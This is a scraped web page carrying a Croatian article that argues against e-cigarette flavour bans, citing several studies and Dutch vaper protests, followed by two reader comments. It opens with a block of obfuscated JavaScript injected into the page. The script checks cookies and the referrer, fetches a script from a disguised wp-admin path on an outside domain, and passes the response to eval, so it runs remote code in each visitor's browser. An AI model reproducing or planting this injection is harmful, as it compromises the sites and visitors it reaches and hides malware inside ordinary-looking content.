;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Reakcije na zabranu aroma za e-cigarete – kolika je zapravo važnost okusa

Diljem svijeta, sve se više govori o zakonima koji bi zabranjivali sve arome za e-cigarete osim onih duhanskih. Glavni razlog koji navodno stoji iza ove ideje je primamljivost raznovrsnosti aroma zbog koje bi na e-cigarete prešli ni samo pušači, već i oni koji nikada nisu pušili (a prvenstveno djeca i mladi).

Iako ovo na prvu zvuči kao valjan razlog, vrijeme i čitav niz istraživanja je pokazalo da stvari nisu baš toliko jednostavne te da bi zabrana aroma sa sobom mogla donijeti više štete nego koristi.

Reakcije američkih vapera na ograničenja aroma za e-cigarete

Nedavna studija objavljena na Nicotine & Tobacco Research, imala je za cilj utvrditi reakcije mladih odraslih u SAD-u na ograničenja prodaje e-cigareta, e-tekućina te aroma za e-cigarete.

Studija pod naslovom “Reakcije na ograničenja prodaje aromatiziranih vape proizvoda ili svih vape proizvoda među mladim odraslim osobama u SAD-u” analizirala je podatke iz longitudinalne studije na 2159 mladih odraslih osoba u dobi između 18 i 34 godine, u 6 gradskih područja (Atlanta, Boston, Minneapolis, Oklahoma City, San Diego, Seattle). Tražili su razine podrške za različita ograničenja prodaje e-cigareta među vaperima i onima koji ne koriste cigarete.

Prikupljeni podaci pokazuju da mladi vaperi uglavnom nisu za restrikcije vapea. “24,2% korisnika e-cigareta (i 57,6% ne-korisnika) podržalo je (snažno/donekle) ograničenja prodaje aromatiziranih vape proizvoda; 15,1% korisnika e-cigareta (45,1% ne-korisnika) podržalo je potpuna ograničenja prodaje vape proizvoda. Ako je ograničeno na okuse duhana, 39,1% korisnika e-cigareta izjavilo je da će vjerojatno (vrlo/donekle) nastaviti koristiti e-cigarete (30,5% uopće nije vjerojatno); 33,2% vjerojatno će prijeći na cigarete (45,5% uopće ne)”, stoji u sažetku studije.

Istraživački je tim otkrio da je u slučaju ograničenja okusa 39,1% korisnika izjavilo da će vjerojatno nastaviti koristiti vape, dok će se 33,2% vjerojatno vratiti na cigarete. „Oni koji će najvjerojatnije izvijestiti o pozitivnom utjecaju takvih politika koje se provode bili su rjeđi korisnici, nepušači i oni s većim zdravstvenim problemima vezanim uz e-cigarete.”

Utjecaj okusa i drugih karakteristika proizvoda

Još jedna nedavna studija imala je za cilj razumjeti utjecaj čimbenika poput vrste uređaja, okusa, razine nikotina i cijena na izbor odraslih korisnika e-cigareta između e-cigareta zatvorenog i otvorenog sustava, cigareta i grijanih duhanskih proizvoda.

Istraživački tim je otkrio da su sudionici u prosjeku preferirali okuse bez duhana i bez mentola, većina je preferirala otvoreni sustav u odnosu na uređaje zatvorenog sustava i redovitu razinu nikotina u odnosu na nižu razinu nikotina.

Međutim, dodaju istraživači, te sklonosti variraju ovisno o pušačkom statusu, demografiji i vrsti vapea i okusa koje korisnici primarno koriste. A preferencija za različite karakteristike proizvoda bila je veća od razlike između okusa ili razina nikotina.

Nizozemski prosvjedi ističu važnost aroma za e-cigarete

U Haagu su vaperi prošle godine ponovno izašli na ulice u znak protesta protiv novih propisa, ujutro kada su se sastali članovi Odbora za zdravstvo kako bi raspravljali o Vladinom prijedlogu za zabranu okusa vapea.

U skladu s tim, u priopćenju za javnost WVA je istaknuto da je zemlja svjedočila najvećem broju odgovora ikad prikupljenih u javnom savjetovanju o zdravstvenim pitanjima. Što je još važnije, velika većina odgovora, 98,54%, bila je protiv zabrane. To je jednako 746 odgovora od ukupno 757 podnesaka zabilježenih na službenoj web stranici.

Važnost aroma kao sastavnog dijela e-cigarete

Nakon toga, ujutro kada su se članovi Odbora za zdravstvo sastali kako bi raspravljali o zabrani prošlog ljeta, WVA je održala još jedan prosvjed ispred Zastupničkog doma. Vejperi i vlasnici vape shopova dijelili su uzorke sladoleda odvratnog okusa, u pokušaju da podsjete zastupnike i javnost na važnost okusa i koliko su oni od vitalnog značaja za poticanje pušača na prelazak s pušača.

“Kada je ovaj prijedlog stavljen na javnu raspravu, dobio je jedan od najvećih odgovora ikad, s 98% ispitanika koji se protivilo zabrani. Poruka državnom tajniku bila je jasna – okusi vapinga pomažu pušačima da prestanu pušiti, a njegovom smiješnom planu postoji veliko protivljenje”, rekao je direktor Svjetske alijanse Vapera, Michael Landl.

Studija pokazuje da zabrana okusa povećava stopu pušenja

Odražavajući Landlove komentare, nedavna studija koja se bavi zabranom okusa postavljenom u američkom gradu San Franciscu, izvijestila je o alarmantnim nalazima. Pod naslovom “Utjecaj sveobuhvatne zabrane okusa duhana u San Franciscu među mladim odraslim osobama“, aktualna studija provedena je s ciljem utvrđivanja utjecaja zabrane na ponašanje pušenja. Uzorak od 247 stanovnika San Francisca ispitan je o njihovoj upotrebi e-cigareta i duhana, prije i nakon zabrane okusa.

Studija je pokazala da, iako je zabrana dovela do pada prodaje e-cigareta, nažalost također je uzrokovala porast u stopama pušenja. Osim toga, istraživači su otkrili da se mjera nije pravilno provodila, a 65% sudionika izjavilo je da mogu dobiti aromatizirane proizvode na više načina.

“Ovi nalazi upućuju na to da opsežne zabrane lokalnih okusa, same po sebi, ne mogu oštro smanjiti dostupnost ili upotrebu aromatiziranih duhanskih proizvoda među stanovnicima. Ipak, lokalne zabrane još uvijek mogu značajno smanjiti ukupnu upotrebu e-cigareta, ali mogu povećati pušenje cigareta”, zaključuje se u studiji.

Choose your Reaction!
 • Ovo nema veze sa zdravim razumom. Znamo svi kako su u prošlosti završavali pokušaji prohibicije/zabrane alkohola i Marije Huane.
  Razvit će se black market koji neće biti uopće reguliran i od cijele inicijative da se ljudima zabrani stvar izbora doći će do toga da će biti
  samo više štete nego benefita. Smiješni su im i argumenti, kao okusi potiču na vejpanje. Cigarete kao takve nemaju uopće neku privlačnu aromu,
  što bi se reklo nit’ mirisa, nit’ okusa. I opet ih ljudi koriste prekomjerno. Tko ćeli vjepati, vejpati će i čiste duhanske arome.
  Osobno, nisam ljubitelj voćnih aroma, nisu mi ni desertne baš prvi izbor, no to ne znači da bih drugima zabranio korištenje istih.
  Nisam vidio da se igdje vodi tako opsežna i jaka kampanja da se zabrani klasična duhanska industrija, čast izuzetcima poput UK.

 • Ako ovo ikad zaživi, bit će zanimljivo kak će se regulirati taj duhan u tekućinama :) (da ne ponavljam i tu sve kaj sam već napisao na FB grupi)

Leave a Comment